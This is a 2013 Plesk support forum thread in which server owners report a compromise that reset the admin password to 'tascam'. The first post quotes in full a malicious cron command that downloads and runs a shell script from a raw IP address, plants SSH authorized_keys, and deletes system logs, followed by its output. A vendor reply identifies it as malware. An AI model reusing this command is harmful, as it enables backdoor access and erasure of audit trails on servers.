• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

Some psa cronjob failed, and everything is screwed up

M

matteosistisette

New Pleskian
I got this email with the output of of some cronjob executing some of Plesk's broken scripts, and it's full of errors:

Cron <root@ks3094309> cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php

--2013-01-16 00:54:01-- http://128.173.237.127:8080/browser/browser/backup1.sh
Connecting to 128.173.237.127:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 960 [application/x-sh]
Saving to: `backup1.sh'

0K 100% 35.5M=0s

2013-01-16 00:54:01 (35.5 MB/s) - `backup1.sh' saved [960/960]

chmod: invalid mode: `x'
Try `chmod --help' for more information.
/tmp/backup1.sh: line 2:
: command not found
mkdir: cannot create directory `.ssh': File exists
/tmp/backup1.sh: line 3:
: command not found
/tmp/backup1.sh: line 4:
: command not found
--2013-01-16 00:54:01-- http://128.173.237.127:8080/browser/browser/authorized_keys2
Connecting to 128.173.237.127:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 376
Saving to: `authorized_keys2.1'

0K 100% 13.9M=0s

2013-01-16 00:54:01 (13.9 MB/s) - `authorized_keys2.1' saved [376/376]

/tmp/backup1.sh: line 5:
: command not found
/tmp/backup1.sh: line 6:
: command not found
/tmp/backup1.sh: line 7:
: command not found
/tmp/backup1.sh: line 8:
: command not found
/tmp/backup1.sh: line 9:
: command not found
/tmp/backup1.sh: line 10:
: command not found
/tmp/backup1.sh: line 11:
: command not found
/tmp/backup1.sh: line 12:
: command not found
/tmp/backup1.sh: line 13:
: command not found
/tmp/backup1.sh: line 14:
: command not found
/tmp/backup1.sh: line 15:
: command not found
/tmp/backup1.sh: line 16:
: command not found
/tmp/backup1.sh: line 17:
: command not found
chattr: No such file or directory while trying to stat /usr/local/psa/admin/htdocs/enterprise/control/control.php
chattr: No such file or directory while trying to stat /usr/local/psa/admin/htdocs/enterprise/control/index.jsp
mv: cannot stat `agent.php': No such file or directory
mv: cannot stat `old.php': No such file or directory
mv: cannot stat `Agent.php': No such file or directory
Click to expand...

Starting from then, I cannot login anymore into Plesk. It says incorrect login or password, but i definitely have NOT forgotten my password.

I would open a support ticket but since I cannot even log into Plesk I cannot retrieve my license number which I OBVIOUSLY don't remember.

Some broken script of Plesk seems to have f***ed up everything.
Please somebody from Parallels help.
 
Last edited:
Turns out the password had been reset to "tascam" (a value I certainly never set).
(I found out by looking at /etc/psa/.psa.shadow

So I logged in, changed the password, and tried to submit a support ticket.

But I'm told you have exceeded the support period and have to pay to get support. On a bug in the software of which you are already paying a license. Makes perfect sense.
 
We have answered on your question to bugreport@
Please check it.
 
Same problem with our server

Hello,

Could you explain exactly what has happened here as one of our servers has had exactly the same problem (Plesk 9.0.1). The password had also been reset to 'tascam'. Has the server been hacked? We couldn't find anything suspicious but we obviously want to know how it has happened. That two server both had there passsords changed to the same value around the same time seems incredibly unlikely except by design.

Cheers, Neil
 
Same Problem

Got the same problem on our server. It seems to be hacked, password has been also changed to "tascam". I changed my root password and can access the server as usual. Sicne the pass has been changed, I get the following message from the root server every minute:

--2013-01-22 10:15:01-- http://128.173.237.127:8080/browser/browser/backup.sh
Connecting to 128.173.237.127:8080... connected.
HTTP request sent, awaiting response... 404 /browser/browser/backup.sh
2013-01-22 10:15:02 ERROR 404: /browser/browser/backup.sh.

chmod: invalid mode: `x'
Try `chmod --help' for more information.
sh: /tmp/backup.sh.sh: No such file or directory
chattr: No such file or directory while trying to stat /usr/local/psa/admin/htdocs/enterprise/control/control.php

chattr: No such file or directory while trying to stat /usr/local/psa/admin/htdocs/enterprise/control/index.jsp

mv: cannot stat `agent.php': No such file or directory
mv: cannot stat `old.php': No such file or directory
mv: cannot stat `Agent.php': No such file or directory

We are currently evaluating the whole thing. Does anybody know, how the hack has been performed and what the script did on our server? Any hints what we shall be aware of?
 
There was following reply to matteosistisette:

The script you've provided is not a Plesk's cronjob.
Instead it looks like a kind of malware.
I suggest you to check that all Plesk's microupdates are installed on the server (should be 9.5.4 MU#27): http://kb.parallels.com/9294 Keep your OS up2date Check the server with antivirus/rootkit hunter software Analyze cronjobs and remove all suspicious.
Change passwords.
 
Same problem with password reset

We've noticed the same problem with the admin password being reset to 'tascam' (not by us). This seems to coincide with an auto update of Plesk to 9.0.1. Anyone got any more details on why that's happening?
 
Same here

I had the password changed to tascam as well. The user had also been changed to 'test'.

To be honest, I found Parallel's page on how to fix it pretty complicated and not at all simple if you're an SSH newbie like me - the link below helped massively when trying to get Plesk back online so I could at least start changing passwords etc.

http://wpguru.co.uk/2010/07/when-plesk-fails-to-upgrade/
 
You must log in or register to reply here.

Similar threads

K
Resolved Upgrade Problems
Replies
4
Views
1K
KlausZ
K
M
Issue Schedule a Task-every 10 minutes: Fetch a URL 'https://site.com/folder/cron.php' fetched Status: 404 Output: File not found.
Replies
11
Views
2K
robinofthewood
R
R
Issue Update to plesk 18.0.40 failed
Replies
2
Views
2K
IgorG
IgorG
PleskSergeant
Resolved Migrator fails with message "Unknown IP address type"
Replies
0
Views
730
PleskSergeant
PleskSergeant
E
Issue Updates and Upgrades are not working on the Server
Replies
2
Views
917
Bitpalast
Bitpalast
Back
Top